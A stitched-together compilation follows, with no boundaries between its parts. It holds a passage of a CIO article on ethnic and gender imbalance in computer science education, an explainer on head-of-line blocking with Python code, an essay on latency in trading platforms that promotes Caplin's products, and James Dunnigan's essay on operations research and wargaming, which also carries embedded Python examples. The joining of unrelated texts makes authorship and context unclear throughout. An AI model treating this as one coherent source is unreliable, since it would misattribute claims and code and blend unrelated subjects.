"Most of the kids who do not get to participate in computer science are kids of color, kids in low-income communities and girls. And there's a number of reasons for that. First, it's not offered in their school. Second, we also have to look at who is either encouraged to take it, either explicitly or implicitly," she said.
Computer science for all initiative
Moritz noted the administration's Computer Science for All initiative that aims to universalize computer science education, as well as the president's latest budget proposal, requesting two tracks of funding that would support state and district efforts to expand programming courses in schools.
[ Related: Obama announces computer science for all initiative ]
Those efforts to expand computer science education, along with the work of nonprofit groups like Code.org and many firms in the private sector, find an economic justification in new research from the Economist Intelligence Unit, sponsored by the trade group BSA, which pegged the software industry's contribution to U.S. gross domestic product in 2014 at $1.07 trillion.
That study concluded that software accounts for some 9.8 million jobs -- both in direct employment within software firms and jobs in other fields that are supported by software.
BSA's research cited salary data from the Labor Department, which reported that software developers, on average, earned $108,760 in 2014, compared to the average annual wage for all other jobs of $48,320.
"This can be an incredible opportunity to be able to close very persistent equity gaps that we see in this country because of the high wages that are available," Moritz said. "You think about the opportunity that going into computer science or a computing-related field provides for a student who is coming from a low-income background in terms of their employment and the amount of money that they can make over the course of their life -- that is huge, but we have to treat it as an equity issue."
[ Related: Who needs a computer science degree these days? ]
Historically, the United States has enjoyed a competitive advantage in the software field when measured against foreign rivals, some speakers noted. But that's no argument for complacency.
Ryan Burke, a senior policy advisor on the White House National Economic Council, recalled a recent visit to Delaware, where she met with local tech employers who reported that they were having a hard time hiring graduates from a local community college, because the instructors there were teaching a programming language that was three years behind what businesses were using in the field.
Burke singled out efforts by Coursera and LinkedIn to better align the type of instruction that colleges and other educational programs are offering with what employers are looking for, stressing that the accelerating pace of change in technology is going to require schools to move more quickly to keep their programs up to date.
"We know that these technology changes are going to lead to job shifting not every decade or century, but every year and month, which means that our education and training programs need to be able to adapt as fast as those jobs needs are changing," Burke said. "We know it's just not happening fast enough."
This story, "Ethnic, gender imbalances plague computer science education" was originally published by CIO.
Head-of-line blocking (HOL blocking) in networking is a performance issue that occurs when a line of packets is held up by the first packet in the queue. It happens especially in input-buffered network switches, where out-of-order delivery of packets can occur. A switch can be composed of input-buffered ports, output-buffered ports and a switch fabric.
When first-in first-out (FIFO) input buffers are used, only the packet at the head of each queue is eligible to be forwarded. If that packet cannot be forwarded because its destination output port is busy, every packet queued behind it is blocked as well, even when their own output ports are free. That is head-of-line blocking.
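A few lines of Python make the effect concrete. The single-round arbitration model below is a deliberate simplification of a real switch fabric (the function name and traffic pattern are invented for illustration):

```python
from collections import deque

def forward_round(queues, free_outputs):
    """One arbitration round: each queue may forward only its head packet,
    and only if that packet's destination output port is free."""
    forwarded = []
    for q in queues:
        if q and q[0] in free_outputs:
            free_outputs.remove(q[0])
            forwarded.append(q.popleft())
    return forwarded

# A single FIFO input queue holding packets destined for outputs A then B.
fifo = deque(["A", "B"])
# Output A is busy this round (say, another input port already claimed it),
# output B is free. The packet for B still cannot move: it is stuck behind
# the head-of-line packet waiting for A.
sent = forward_round([fifo], free_outputs={"B"})
print(sent, list(fifo))  # [] ['A', 'B'] -- head-of-line blocking

# With virtual output queues (one queue per destination) the same traffic
# is split, so the packet for B is no longer behind the packet for A.
voq = [deque(["A"]), deque(["B"])]
sent_voq = forward_round(voq, free_outputs={"B"})
print(sent_voq)  # ['B'] -- the packet for the free port goes through
```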
To my mind, IT governance is ultimately about having fact-based confidence in achieving desired business outcomes, and these often depend on addressing technical issues. If the desired outcome, for example, is an effective and profitable single dealer platform, which allows a financial institution's customers to deal with it for a range of trading assets (FX, credit, equities and so on) through a single internet application, one of the issues that must be addressed is latency.
So, what is latency? Well, it's not the same as response time, which it is sometimes confused with—you can have sub-second response times for, say, pricing information and still see a price on your screen that is out of date, because of latency issues.
Broadly speaking, latency is the time taken for changes in data to reach you from wherever the change is made (whereas response time is usually the time taken to get data out of a local store or cache). Response time is to do with the system supplying something (even a "please wait" message); latency is about it supplying the correct information at a point in time. And latency is also about consistency; a consistent 250 msecs delay can be managed; an average 250 msecs delay, with delays occasionally stretching to seconds, is a much bigger problem (and life being what it is, you can bet that the delayed transaction is an important one).
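That point about consistency is easy to demonstrate. In the sketch below (the sample values are invented), the mean looks respectable while the tail hides exactly the kind of occasional multi-second delay described above:

```python
import statistics

def percentile(samples, pct):
    """Nearest-rank percentile of a list of latency samples."""
    ordered = sorted(samples)
    rank = max(0, round(pct / 100.0 * len(ordered)) - 1)
    return ordered[rank]

# 98 updates arrive in a consistent 250 ms; two stragglers take 3 seconds.
latencies_ms = [250] * 98 + [3000] * 2
print(statistics.mean(latencies_ms))   # 305 -- looks manageable
print(percentile(latencies_ms, 50))    # 250 -- the typical case
print(percentile(latencies_ms, 99))    # 3000 -- the delay a key trade may hit
```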
There will always be some latency—no message can travel faster than the speed of light (until quantum entanglement can be exploited, that is), which imposes a measurable delay, and every network node a message passes through imposes a rather more significant delay on top of this. However, in a system dealing with human traders, the time taken for a human to make a decision and press a key imposes a sensible limit on how low latency needs to be. This isn't necessarily the case for "high speed trading" between computers but the issues are similar, just orders of magnitude more difficult to deal with, and I won't talk about them here.
Imagine a market moves (perhaps someone dumps a large quantity of stock in Hong Kong) at 12:00:00 GMT. Immediately, the price of the security changes in Hong Kong as a result of the deal, and financial databases around the world then start to synchronise on the new price. However, this will take some time.
Suppose the news of the new price takes a second and a quarter to reach London—probably unacceptable but not unthinkable. Now, what happens if a financial institution's client in London purchases the security at 12:00:01 GMT, on the basis of the price on his/her screen at 12:00:01 in London, before the 12:00:00 change arrives? What price does he pay—the price actually in effect at 12:00:01 or the 11:59:59 price, before the Hong Kong deal, which is what he/she is seeing in London?
Well, it depends. If the transaction is "request for quote", the financial institution will recheck the price before making the sale and usually accept it if the price has not moved or moved in the financial institution's favour and reject it if it has moved in the client's favour. If latency is a problem, the client will be making buying decisions based on out-of-date information and probably, as a result, experiencing a lot of rejected trades—resulting in an unhappy customer (even more so if the customer finds out that he/she lost out significantly on accepted trades). However, many institutions would like to move to a "click to trade" system, where the trade is made immediately without further checks and the financial institution honours the price its client saw on his/her screen, because this places fewer barriers in the way of trading and should increase business. Now, the financial institution is much more exposed to latency as it has to complete the deal even if the price has moved against it and, with a big securities deal, the difference in price might be many thousands of dollars. So, the financial institution will monitor latency and will probably grey out the "click to trade" option if latency increases beyond about 400 msec, say, which is of the order of magnitude of the brain's response time. Now we have unhappy customers again and if the "click to trade" option is greyed out often enough, the financial institution also, in effect, loses a potential sales channel.
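A guard like the one described, greying out "click to trade" when recent latency gets too high, might be sketched as follows (the class name, window size and gating rule are assumptions for illustration; the 400 ms threshold comes from the example above):

```python
from collections import deque

class ClickToTradeGuard:
    """Disable one-click trading when recent update latency is too high."""

    def __init__(self, threshold_ms=400, window=20):
        self.threshold_ms = threshold_ms
        self.samples = deque(maxlen=window)  # most recent latency samples

    def record(self, latency_ms):
        self.samples.append(latency_ms)

    def click_to_trade_enabled(self):
        # Gate on the worst recent sample, not the average: a single slow
        # update is enough to leave a stale price on the client's screen.
        return bool(self.samples) and max(self.samples) <= self.threshold_ms

guard = ClickToTradeGuard()
for ms in (120, 180, 150):
    guard.record(ms)
print(guard.click_to_trade_enabled())  # True -- latency is consistently low
guard.record(950)                      # a latency spike arrives
print(guard.click_to_trade_enabled())  # False -- grey out the button
```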
So, why is latency a problem now, when it should be rather smaller than it used to be when communication was by telegraph and telephone? Well, Internet communications have increased customer expectations (although Internet latency is far from deterministic) and the importance of electronic channels; and strengthening regulation (MiFID, in retail equities trading, is an example of the way regulators are thinking) are increasing transparency. Badly managed latency does not increase customer confidence, is becoming harder to hide and, in extreme cases, could attract the attention of the regulators.
As I said, some latency is unavoidable but it is easiest to manage if it is consistent, across channels, across time and as workload increases. And, the smaller the absolute latency is, the less any remaining inconsistencies will matter. The worst case is a channel with significantly worse latency than alternative channels carrying the same information (leading to possible arbitrage opportunities), where the actual latency experienced by any particular transaction varies widely and increases unpredictably as the channel approaches capacity.
Managing response time is relatively straightforward (chiefly, avoiding design bottlenecks and providing plenty of cache). Latency is much harder to manage, quite apart from the speed of light limitation. Latency can be introduced by network nodes (switches, routers and so on), Internet routing problems, overloaded databases, security technology (firewalls) and even manual authentication processes. As long as it is deterministic and known, it can be allowed for, but if random messages experience very high latency the business service becomes unmanageable.
What this all means is that latency must be explicitly addressed in the design of any computerised system where it might be a factor. It can't simply be left to chance—buying fast computers and fast networks is no guarantee that latency issues won't arise when the system is overloaded or hardware fails—or even with certain combinations of transactions.
One useful approach is to adopt an inherently low-latency framework, which manages communications latency for you and provides an API on each side of its channel. So all your programmers have to worry about is the value-add your processes deliver to your customers (and latency outside the communications channel), not about the skilled and specialist job of designing low-latency infrastructure.
An example of such a framework comes with Caplin's Xaqua, an Internet-based single dealer platform financial hub for exchanging trade messages and market data with subscribers, that is network agnostic and tunnels through proxy servers and firewalls automatically. Caplin Liberator is the component of Caplin Xaqua which provides two-way low-latency web streaming of financial data.
Caplin supplies benchmarking tools suited to streaming applications—its inherently low and consistent latency comes from its streaming design, although its absolute performance depends on the power of the platform it's running on, of course. Caplin Benchtools can create multiple concurrent client sessions subscribed to real-time updating objects—the same load conditions that real end-users experience when connecting to Liberator over the Internet—and test the sort of persistent HTTP streaming connections that most HTTP load-testing tools have difficulty with.
Depending on the workload characteristics, end-to-end latency ranges from about 50 msecs to about 250 msecs using sensible hardware. However, what is interesting is that Caplin claims to show that latency on its platform remains just about constant as client numbers increase, up to the point where capacity is reached (where latency goes through the roof), and that the actual latency experienced clusters around a single value. The distribution of latency and the way it changes with load is more important (within reason) than the actual values, and achieving these characteristics is non-trivial. Hence the advisability of using a tried-and-tested framework and the need for tools which can simulate the workloads you are likely to encounter.
So, we have here is a situation where a technology solution to managing latency can be seen as part of "good IT governance", and has to deliver compliance with internal policies for "acceptable latency". However, failing to implement good governance in this area isn't about failing to check a box or meet some industry good practice standard or even about the possibility of annoying some regulators. It's about having increasingly unhappy customers and being unable to implement an innovative channel to market that could deliver more customers and higher profits.
IT governance can be seen, in part, as giving the business confidence that its technology can support, in this case, its business Internet trading strategies and vision, at the business level.
Operations research (OR) is the use of quantitative techniques (statistics, etc.) to solve problems and help leaders make decisions. OR has been around for centuries, but in the decade before World War II it came to be recognized as a distinct discipline. Operations research was used extensively during World War II to solve numerous problems; everything from how best to use radar or hunt submarines to running factories and getting supplies to the troops efficiently. Following this wartime experience, there were even more numerous peacetime successes. This led to OR being called "Management Science." OR is still widely used in military applications.
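As a toy example of the kind of problem OR formalizes, consider the classic assignment problem: matching workers to tasks at minimum total cost. The cost matrix below is invented, and the brute-force search is only viable for tiny instances (real OR practice would use the Hungarian algorithm or a linear-programming solver):

```python
from itertools import permutations

# Hypothetical cost matrix: cost[w][t] = hours for worker w to finish task t.
cost = [
    [9, 2, 7],
    [6, 4, 3],
    [5, 8, 1],
]

def best_assignment(cost):
    """Exhaustively search one-to-one worker-to-task assignments."""
    n = len(cost)
    best = min(permutations(range(n)),
               key=lambda tasks: sum(cost[w][t] for w, t in enumerate(tasks)))
    return best, sum(cost[w][t] for w, t in enumerate(best))

assignment, total = best_assignment(cost)
# Worker 0 takes task 1, worker 1 takes task 0, worker 2 takes task 2.
print(assignment, total)  # (1, 0, 2) 9
```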
Why is it that OR never gets any respect? Operations Research is, arguably, the most important scientific development of the 20th century. OR, like the earlier Scientific Method, is basically a management technique. Management is also a 20th century concept that gets little respect. In some respects, OR is the combination of management principles and the Scientific Method. Without the breakthroughs in management techniques, the enormous scientific progress of the 20th century would not have been possible.
Unfortunately, management is, like the air we breathe, something most of us take for granted. But take away the air, or the management, and you notice the absence real quick. Techniques have always had difficulty getting attention. You cannot see them. Objects, on the other hand, are easy to spotlight and promote in the media. Even genetic engineering can generate pictures of new proteins, or the latest crop of clones. But how do you get a picture of OR in action? Someone playing with a slide rule or workstation doesn't quite cut it. It's so bad that the most common representation of engineers at work is Dilbert. And no one has ever asked me to talk about OR on TV or radio.
OR The Ancient Art
Part of the problem is that OR has actually been around for thousands of years, it just wasn't codified until the 20th century. From Alexander the Great to Thomas Edison, we have records of great men applying OR methods to problems. They just didn't call it OR. But if you examine what they did, it was. Consider some of the examples. Alexander the Great, and his father Philip, had a firm grasp of politics, finance and mathematics. There was no magic involved in how Philip came out of nowhere and dominated the more powerful Greeks. His son was equally astute, coming up with one clever solution after another. Alexander was always in the company of mathematicians and scientists, something which Greece had an abundance of at the time. Military, scientific and political problems were all carefully thought out and solutions adroitly implemented. Take a close look at the period and you'll recognize a lot of OR at work. The Romans were equally adept, and much OR can be seen as they built the largest empire of the ancient period. Napoleon, who was educated as a mathematician, again used OR tools to innovate and accomplish his goals. And then there was Thomas Edison, the most prolific inventor ever. He gave a splendid example of military OR in action two decades before OR was recognized as a discipline. Asked by the US Navy to help in dealing with German subs and the threat to US shipping, Edison analyzed the situation and came up with the convoy system and much of what we now think of as convoy protection and anti-submarine warfare.
OR The Packaged Art
The reason OR had to be reinvented time and again was that no one in the past established OR as a distinct discipline. This was common in the ancient world, where many modern devices, like the steam engine, were invented, but there were no trained engineers to bring such devices to production and widespread use, or to record and preserve the technology. Until the last two centuries, knowledge was acquired via apprenticeship, not formal education. But the achievements of those few who reinvented OR were always considered individual genius, not something you could package and reuse. Packaging knowledge is another 20th century movement that propelled everything else. While books have been around for thousands of years, and the modern university education was developed in the 19th century, the mass production of scientists and engineers is a 20th century innovation.
Roger Bacon invented, published and propagated the Scientific Method in the 13th century. This led to a steady and growing progress in science and engineering. OR was the next logical development in the systematic application of knowledge to problems. But we should take heed of the experience with the scientific method. This technique was used successfully by scientists, but also misused or ignored by opportunists, politicians and charlatans of all types.
OR's Few Practitioners
Because OR requires you to think clearly and methodically, there aren't many practitioners. Despite strenuous efforts, only about five percent of US army officers are familiar with OR techniques (based on an estimate I did with Army OR instructors at Ft. Lee.) And the army has cut back on the training of officers in operations research techniques. The Scientific Method is rather simpler to explain and implement than OR. The Scientific Method was a relatively simple recipe for getting to the truth. It is taught in high school science courses. OR involves a lot more imagination and heavy duty math. Coming out of World War II, U.S. flag officers were true believers in OR. Soon there were several new agencies set up to do OR type work. Outfits like the Army's Operation Research Office (ORO), the Army-Air Corps' Operations Analysis Division (OAD) and the Navy's Operations Evaluation Group (OEG, formerly ASWORG). In the beginning, OR was considered such a broad approach to problem solving that many different disciplines were accepted as part of the process. But eventually OR practitioners like Koopman, Leach, Morse, Kimball, Newman, Solant etc. came up with a generally accepted curriculum. Initially, the non-military universities providing OR instruction taught the fundamental academic subjects and some applications. This approach was less pure OR and more systems engineering and business decision/quantitative sciences. Officers obtained OR training at the Naval Post Graduate School, the Air Force Institute of Technology and the civilian schools the Army used for such training (Georgia Tech, Colorado School of Mines, Florida Institute of Technology, and MIT). Other civilian schools producing OR practitioners were: Purdue, Texas Tech, UT Austin, Ohio State, and Texas A&M. By the 1980s, the Army had created MOS 49 (Operations Research/Systems Analyst) and established a school at the Logistics Management College at Ft Lee, VA.
Graduates could go right to work, or transfer to a Masters degree program with 15 credits already taken care of by the Ft Lee course. There were between two and four classes a year, with about thirty officers per class. During the same period other military schools were running two classes a year with varying numbers of students. Naval Postgraduate School had 40 per class, Colorado School of Mines had ten, Georgia Tech had five and AFIT 25 students per class. Graduates were sent off to places where analytical skills were needed, especially in staffs and research operations. Results were forthcoming, as a lot of the smart moves made during the 1980s were done with OR operators' guidance. There were enough OR practitioners that OR cells could be set up in many key organizations. This all changed when the Cold War ended. Staffs were cut and the smart guys were the first ones to move out for greener pastures. The OR operators knew they were in demand outside the military, and also realized that someone in a narrow specialty like OR was not going to make a lot of rank. Another "peace dividend" cutback was in training for military OR specialists. The service schools for teaching OR were shut down and officers sent to civilian OR courses. This was not the same, as the military used OR differently than civilian organizations. However, sending the students to the civilian schools made it easier for these officers to get jobs when they decided to bail out.
But the very complexity of OR makes it possible to encapsulate OR as a distinct tool. This is what is happening: a black box on steroids. Going into the 21st century, we are beginning to mass produce robotic scientists and engineers. Increasingly, control devices use computers and OR techniques to run everything from automobile engines to stock portfolios. We think nothing of using powerful microprocessors and sensors to do, automatically, what once took a team of highly trained people to do. OR appliances (ORAs) are an outgrowth of the development of expert systems and more powerful microprocessors. We already have ORAs in the form of powerful diagnostic systems on PCs and in automobiles and other vehicles. We tend to overlook the increasing amount of problem solving AI being used in machines and large systems. Diagnostic software, in particular, is making great strides.
OR and Wargames
OR has not served us as well as it could in wargaming and policy studies. Many lost opportunities have resulted. Take the Rwanda situation. The myth forming is that if troops had been sent in immediately, there would have been no genocide. In part, this is another case of amateurs studying tactics while professionals pay attention to logistics. But where are the OR studies of this situation? It's not a difficult one to do. Calculating the logistics is easy; working out the impact of peacekeeping troops on the killing is a bit more of a challenge.
More Process Than Problem Solving
Wargames are another area that could use more OR. As far as I can tell, OR shows up most often in professional wargame development as more process than problem solver. You can make a case that is how it should be, but my personal experience was that OR was the primary tool for developing a simulation of a historical conflict. OR techniques were used to solve the problem of how to develop a system that would generate reproducible results. Those of you who have played manual wargames long enough to absorb those games design techniques, and have designed your own, know what I mean. Wargame designers have abundant personal experience in making this work. I first encountered this while inadvertently predicting the outcome of the 1973 Arab-Israeli war, and more deliberately predicting the process by which the 1991 Gulf War was fought. A few years later, the lead designer on the Gulf War game found himself tasked, on very short notice, to create an accurate game of a conflict between Ecuador and Peru. His CINC gave him a medal for that effort, for the CINC considered COL Bay's overnight effort superior to what was being sent down from Washington. Even with the new wargaming MOS in the army, you still have tension between OR practitioners and wargamers. As OR types are heard saying, when you've tried everything else, try simulation. This destructive attitude was picked up in the civilian schools now teaching officers OR and is another example of how inadequate such schools are for training military OR practitioners.
Fear of Trying
Some subjects are difficult to even touch in professional wargames. And these are often issues that any straight-ahead OR analysis would encounter and deal with. But many OR operators shy away from the soft factors (morale, interpersonal relationships, fog of war and the like). For example, one of my games (NATO Division Commander, or NDC) was adopted by the CIA as a training device in the early 1980s because it went after items CIA analysts felt were crucial, but most wargames, especially DoD wargames, avoided: namely, personnel issues among the senior leadership. NDC was part wargame, part role playing game and double blind as well. I don't think anyone ever did a game on how division staffs operate, but it was a worthy exercise. But it wasn't just the CIA that found wargames like this useful. I have continually heard from officers, with both peacetime and combat experience, who find that wargames give them an edge. The users don't demand that the simulation be anywhere near perfection. Like professional gamblers, the troops know that anything that puts their odds of success over 50 percent provides a tremendous advantage. Such an approach will be essential to handle things like Information Warfare (IW) or the Revolution in Military Affairs (RMA). IW, for example, deals with shaping both friendly and enemy perceptions of what is happening. This is very difficult to model because there are many subjective and soft elements to be quantified. This makes it tough for traditional OR practitioners who try to deal with combat as hard science. Warfare is anything but, and things like IW even less so. But historical game designers have dealt with this sort of thing successfully for decades.
Traditional OR tends to focus on attrition, which is easier to model. But run these models by a military historian and they will provide numerous examples of battles that were won or lost not because of attrition but because of troop morale, or one commander simply deciding he had been beaten.
One solution to the problem of making OR more useful for the troops is the concept of "Battlefield OR Appliances" (BOAs). The business and financial community already uses such beasts (less the "Battlefield" tag) for doing complex analysis in real time. Neural nets and genetic algorithms are attractive for the business "appliances." The idea is to create apps that think quickly and accurately, far more rapidly than any human practitioner. Program trading for financial markets is based on such concepts and, although few will admit it, these trading droids are often turned loose with little human supervision (mainly because there are situations where the action is so fast that slowing the droid down so humans could keep up would cripple the usefulness of the operation). The Air Force has been talking about BOAs in the cockpit (pilot's assistant). The zoomies are thinking about a BOA that would wrestle with things like compensating for battle damage, other equipment problems or EW situations while the pilot continued the battle. Of course, air combat is so complex that pilots could use a little coaching in things like the maneuvers most likely to bring success in a particular operation. Ground units could also use BOAs, especially in conjunction with digitalized maps: setting up optimal defensive positions, patrol patterns or how best to conduct a tactical move. Sailors have similar needs (and one of the first OR successes was the development of optimal search patterns for ASW).
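That ASW search-pattern work produced one of OR's classic results: under Koopman's random-search model, the probability of detecting a target in an area A after sweeping at speed v for time t with sweep width W is 1 - exp(-Wvt/A). A quick sketch, with made-up numbers chosen only for illustration:

```python
import math

def random_search_detection(sweep_width, speed, time, area):
    """Koopman's random-search model: probability of detecting a target
    uniformly distributed in `area` after sweeping for `time`.
    Units must be consistent (here: nautical miles, knots, hours)."""
    return 1.0 - math.exp(-sweep_width * speed * time / area)

# Hypothetical numbers: 10 nm sweep width, 15 kt, 24 h, 10,000 nm^2 box.
p = random_search_detection(10, 15, 24, 10_000)
print(f"P(detect) = {p:.2f}")  # P(detect) = 0.30
```

The point of the model is the diminishing return it exposes: doubling search time does not double detection probability, which is precisely the kind of quantified trade-off a BOA would compute on the fly.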
Imagination versus Knowledge
We live in an age of unprecedented knowledge production. Part of OR is finding the right knowledge and applying it as a solution. One of the better Japanese work habits was their diligent collection of new knowledge. This is one reason why, for several decades, they have been one jump ahead of the "more imaginative" Americans in developing popular new products for the American market. In DoD, only the Marines consistently cast a wide net for new knowledge. When commercial wargaming became popular with the military in the 1970s, it was the marines that went after it most aggressively. When the marines recently showed up on Wall Street to study the workings of financial markets, they were really on to something. The manner in which these volatile, and quite huge, markets have moved from all manual to man-machine trading (program trading, etc) has direct application for the military. And the manner in which the man-machine concepts were implemented were classic OR exercises.
Items that can be expected to happen in the future, either because they are likely, or because we can only hope.
Wizards
Long a part, often an annoying one, of commercial software, these apps are constantly being beefed up to engage in more complex troubleshooting dialogs with users. There is potential here to obtain technology that can be used for battlefield OR appliances. The development work on Wizards draws heavily from decades of work on AI and Expert Systems. Much exciting OR work is going on in this area, and I believe there are already a number of military applications in development.
Troops Rolling Their Own
This has been going on since the early 1980s and the results are becoming more and more impressive. As the off-the-shelf development tools become more powerful, more OR type military and wargaming apps will come from the field. These apps will co-opt the official wargames and sims in shops that want to get the job done rather than just perform the official drill. Some folks may not like this, but you won't be able to stop it.
Much of the technology for these products has long been available off the shelf. Not a lot has been taken up by the DoD crowd, at least not in peacetime. Even slower to cross over have been the commercial development standards, which put wargames through realistic testing routines and quickly modify them as needed. This does get done in wartime, as witness some of the rapid development that occurred during the Gulf War. The only military organizations making use of commercial gaming technology are those outside the DoD wargaming mainstream. The reasons are largely political (commercial stuff is "not invented here") and contractual (doing it from scratch makes for larger contracts).
Process Control and Program Trading Technology
Much of this is proprietary and you'd probably need an Act of Congress to extract a lot of this technology from the firms that developed it. However, much can be obtained from trade journals and a little (legal) competitive intelligence. Most of what is being done is no secret; it's the details of the execution that are closely held. And for good reason. In the financial markets, any edge is usually small and short lived. But this is what makes this technology so valuable. The manufacturing and financial markets are "at war" all the time. They thrive or go bankrupt based on how well their "weapons" perform. And much of the technology is transferable to military uses. Many of the components of commercial apps are available as off-the-shelf toolboxes or widely known concepts. One of the more useful of these is known as "fuzzy logic." This item addresses many of the problems DoD wargamers have with dealing with soft factors. Civilian practitioners face the same problems and they have come up with many working solutions using fuzzy logic. In my experience, nothing is fuzzier than modeling combat.
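For readers who haven't run into it, fuzzy logic replaces yes/no set membership with a degree between 0 and 1, which is what makes it suit soft factors. A minimal sketch, with entirely made-up thresholds for a hypothetical "unit morale" scale:

```python
def triangular(x, lo, peak, hi):
    """Triangular fuzzy membership: 0 outside (lo, hi), rising to 1 at peak."""
    if x <= lo or x >= hi:
        return 0.0
    if x <= peak:
        return (x - lo) / (peak - lo)
    return (hi - x) / (hi - peak)

# Hypothetical morale score 0-100, graded by three overlapping fuzzy sets.
def morale_sets(score):
    return {
        "broken": triangular(score, -1, 0, 40),
        "shaky":  triangular(score, 20, 50, 80),
        "steady": triangular(score, 60, 100, 101),
    }

print(morale_sets(70))  # partly "shaky", partly "steady", not at all "broken"
```

A score of 70 belongs to both "shaky" and "steady" to differing degrees, rather than being forced into one bucket; downstream rules can then blend those degrees instead of branching on a hard threshold.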
What Percent Solution?
There may eventually be more acceptance of OR solutions that are sufficient rather than perfect. When modeling weapons or equipment performance, you can get a 100% solution (or close to it). Many OR practitioners are more comfortable with this than with those elements that involve more people and less machinery. It is currently impossible to get a 100% (or 90%, or often even 50%) solution for things like how an infantryman performs in certain situations. In peacetime, there is a tendency to gold plate things. Errors of any sort are threatening to careers. In wartime, you can make mistakes. Everyone else is making them, and the honors go to those who make the fewest. But the peacetime zero defects attitude hampers innovation and performance. You get a lot of stuff that is perfect, but doesn't work. The latest example of this was seen in the Gulf War. When a more powerful bunker buster bomb was needed, the weapon was designed, developed and delivered in less than two months and used at the end of the war. The air force also improvised a mission planning simulation in record time (using everything from spreadsheets to existing models) and used it. The army CENTCOM wargames shop also improvised (although less successfully, but this was only discovered after the war, a common occurrence in wartime). We should also remember that during World War II, OR practitioners recognized that their calculations could not cover all critical factors. They had to work with fuzzy situations, and before "fuzzy logic" became a recognized tool, the World War II operators managed to work with the problem and not just walk away muttering that "it can't be done." The current rigidity can be traced to the relative lack of operational experience. And when operational experience does become available, it is often the case that battlefield calculations that ignored those pesky soft factors were way off. A good example of this was the analysis TRADOC did of NTC engagements.
They found that the ammunition expenditure data for NTC was much different than the OR predictions, and closer to the expenditures in earlier wars. You cannot ignore dealing with the soft factors, for eventually they will bite you in the ass.
The end of the Cold War coincided with a growing demand for OR skills in the civilian sector. So many of the uniformed OR people left, and their numbers are still dwindling. Where there used to be OR groups in HQs and schools, you don't see much of this anymore. This is bad. Part of the problem is that military OR people can make more money, and have fewer unaccompanied overseas tours, as civilians. But the number of uniformed OR operators is shrinking so much that the military is having a hard time properly supervising the civilian hired guns. It is also important that military OR operators be warriors (or military practitioners) first. Otherwise, you often encounter the syndrome of "if the only tool you have is a hammer, all problems look like nails." The same syndrome is noted in the civilian sector, and the solution is often to take a banker, plant manager, structural engineer or whatever and train them in OR techniques (or programming) and then turn them loose on the problems.
Putting Operations Back into OR
Originally, OR operators researched operations first hand and then devised solutions. There has been a trend away from this and towards an emphasis on technique: linear programming, dynamic programming, queuing theory, chaos theory, neural networks and so on. Knowing these techniques is a good thing, and can even be useful if you collect valid operational data. But it is not real operations research. If you can't get an experienced infantry officer as an OR analyst, then maybe you should consider sending your analysts through boot camp. Most fighter pilots have technical degrees and can pick up OR techniques quickly. Using OR trained pilots to work on combat aviation problems is an enormous advantage, for the operator with practical experience will catch things that the researcher trained only in OR will miss. Happens all the time, and the military is noticing the lack of military experience among the OR practitioners now working on military projects.
Putting the R back into OR
The "R" (research) has been largely replaced by "A" (analysis). The Navy now talks more of "OA" (Operational Analysis) than "OR", with "OA" often being considered an adjunct to Modeling and Simulation. The result has been an emphasis on quantification and metrics at the expense of understanding the problem. Like so many other debilitating trends, this one developed largely in response to what "decision-makers" have demanded. What we often have now is "advocacy analysis," where much time and effort is spent to provide justification of a position or decision based on having more and "better" numbers and metrics than your critics. This often occurs by focusing on a very narrow slice through a problem, one that is often far removed from the true context of the overarching problem.
Crunching Numbers versus Getting Results
There has long been a split among OR practitioners, especially in peacetime, over how best to achieve results. On one side you have the "physics" crowd, who insist on reducing every element of combat to unequivocal data and algorithms. On the other side you have the "whatever works" crew. The "physics" bunch are basically engaged in CYA (Cover Your Ass) operations, because there are many soft factors in combat that are not reducible mathematically the same way weapons effects can be.
Better OR Tools
You can't have too much of this. I'll never forget the first time I did a regression analysis. I did it manually. Try to get students to do that today and you'll get arrested for child abuse. By the 1980s we had spreadsheet plug-ins for Monte Carlo, Linear Programming and so on. I thought I'd died and gone to heaven when I first got to use that stuff. Then came MathCad, SQL on analytic steroids and more. Yes, we want more. We need more. We deserve more. If we can't get any respect, at least we can get more neat tools. Warning: too much of this stuff appears to contribute to overemphasis on analysis at the expense of getting something useful done.
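For anyone curious what that manual exercise involved: the closed-form least-squares fit that once meant grinding through the normal equations on a slide rule now takes a few lines. A sketch with illustrative, made-up data:

```python
def linear_regression(xs, ys):
    """Ordinary least-squares fit y = a*x + b, computed from the
    closed-form normal equations (the sums a slide-rule user once
    worked out by hand)."""
    n = len(xs)
    sx, sy = sum(xs), sum(ys)
    sxx = sum(x * x for x in xs)
    sxy = sum(x * y for x, y in zip(xs, ys))
    a = (n * sxy - sx * sy) / (n * sxx - sx * sx)
    b = (sy - a * sx) / n
    return a, b

# Illustrative data points only, not from any real study.
slope, intercept = linear_regression([1, 2, 3, 4], [2.1, 3.9, 6.2, 7.8])
print(f"y = {slope:.2f}x + {intercept:.2f}")  # y = 1.94x + 0.15
```

Which is exactly the author's point: the mechanics are now free, so the scarce skill is knowing whether the data and the model mean anything.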
Put OR Back in Uniform
A combination of vastly increased demand for civilian quants in the 1990s, reduced promotion opportunities after the Cold War, and the usual problems with having a non-mainstream MOS saw a steady decline in the number of uniformed OR operators. Norm Schwarzkopf was one of these, but he's retired, as are many other OR qualified officers. Either that or they're out making a lot more money as civilian quants. I don't know how you're going to get quants back in uniform. It will take a decision at the top. In times of crises and resource shortages, a lot of really important things get shortchanged because they are difficult to understand.
Please note: This article is revised and expanded from notes used for a talk at a November 2000 INFORMS meeting. I'll be gradually editing this into a more useful format. One of the people at the talk was Mike Garrambone, a long time wargamer and former Major of Engineers (and instructor in wargaming at AFIT). Mike has been working on a history of OR and we are going to work together to integrate that into this document.
About the Author
If you have any comments or observations, you can contact Jim Dunnigan by e-mail at email@example.com. Jim is an author (over 20 books), wargame designer (over 100 designed and publisher of over 500), defense advisor (since the 1970s), pundit (since the 1970s) and "general troublemaker". Dunnigan graduated from Columbia University in 1970. He has been involved in developing wargames since 1966. His first game with Avalon Hill (now a part of Hasbro), "Jutland" came out in 1967. He subsequently developed another classic game, "1914", which came out in 1968. A year later he began his own game publishing company (Simulations Publications, Inc, or SPI). In 1979 he wrote a book on wargames (The Complete Wargames Handbook). In 1980 he began a book on warfare (How to Make War). In 1982 he accepted an invitation from Georgia Tech "to come down and lecture at the annual course they gave on wargaming. Been doing that ever since."
In 1985, he was asked to develop a tactical combat model to see how robotic mines would work. In 1989, he got involved editing a military history magazine (Strategy & Tactics) "which was the one I ran while at SPI." In 1989, he got involved in developing online games, and that continues. Jim edits strategypage.com.
Dunnigan, James F., "The Operations Research Revolution Rolls On, To Where?", DSSResources.COM, 05/28/2004.
